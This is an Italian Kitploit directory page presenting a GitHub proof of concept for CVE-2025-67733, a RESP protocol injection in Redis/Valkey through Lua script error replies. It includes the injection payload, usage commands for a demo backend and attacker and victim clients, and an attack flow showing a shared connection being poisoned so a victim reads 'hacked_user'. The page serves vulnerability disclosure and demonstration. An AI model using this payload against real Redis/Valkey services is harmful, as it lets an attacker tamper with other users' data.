Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-67733 — PoC di iniezione RESP in Redis/Valkey (CVE-2025-67733) | Kitploit
Strumenti/GitHubGitHub/jylab/cve-2025-67733
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubjylab/cve-2025-67733

CVE-2025-67733

PoC di iniezione RESP in Redis/Valkey (CVE-2025-67733)

Vedi Repository
16 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RESP Protocol Injection PoC

Prova di concetto che dimostra la vulnerabilità di iniezione del protocollo RESP tramite messaggi di errore di script Lua in Valkey/Redis.

File

backend.py

Backend Flask che simula un'applicazione web con connessione Valkey condivisa (pool di connessioni).

Endpoint:

Scarica lo strumento
MetodoEndpointDescrizione
POST/api/user/roleImposta il ruolo utente
GET/api/user/roleOttieni il ruolo utente
POST/api/processEsegui script Lua

Utilizzo:

root@kitploit:~
python backend.py <Valkey host> <Valkey port> [password]

# Examples
python backend.py 127.0.0.1 6379
python backend.py 127.0.0.1 6379 mypassword

attacker_client.py

Inietta dati RESP dannosi nel buffer del socket tramite il messaggio di errore dello script Lua.

Payload:

root@kitploit:~
error(redis.error_reply("INJECTED\r\n$11\r\nhacked_user"))

Utilizzo:

root@kitploit:~
python attacker_client.py

victim_client.py

Client legittimo che imposta e recupera i ruoli utente.

Utilizzo:

root@kitploit:~
python victim_client.py set    # Set role to "normal_user"
python victim_client.py get    # Get current role

Dimostrazione dell'attacco

Prerequisiti

root@kitploit:~
pip install flask requests

Passaggi

Terminale 1 - Avvia il backend:

root@kitploit:~
python backend.py 127.0.0.1 6379

Terminale 2 - Imposta il ruolo:

root@kitploit:~
python victim_client.py set
# Output: 'role':'normal_user' has been set.

python victim_client.py get
# Output: 'role':'normal_user'

Terminale 3 - Attacco:

root@kitploit:~
python attacker_client.py
# Output: Socket poisoning successful

Terminale 2 - Ottieni il ruolo (dopo l'attacco):

root@kitploit:~
python victim_client.py get
# Output: 'role':'hacked_user'

Flusso dell'attacco

root@kitploit:~
1. Victim sets role
   victim_client.py set --> backend --> Valkey
                                        SET user:user:role "normal_user"

2. Attacker injects payload
   attacker_client.py --> backend --> Valkey
                                      EVAL 'error(...)' 0

   Backend reads: "-ERR INJECTED\r\n"
   Buffer remains: "$11\r\nhacked_user"

3. Victim gets role
   victim_client.py get --> backend --> Valkey
                                        GET user:user:role

   Backend reads from buffer: "$11\r\nhacked_user"
   Victim receives: "hacked_user"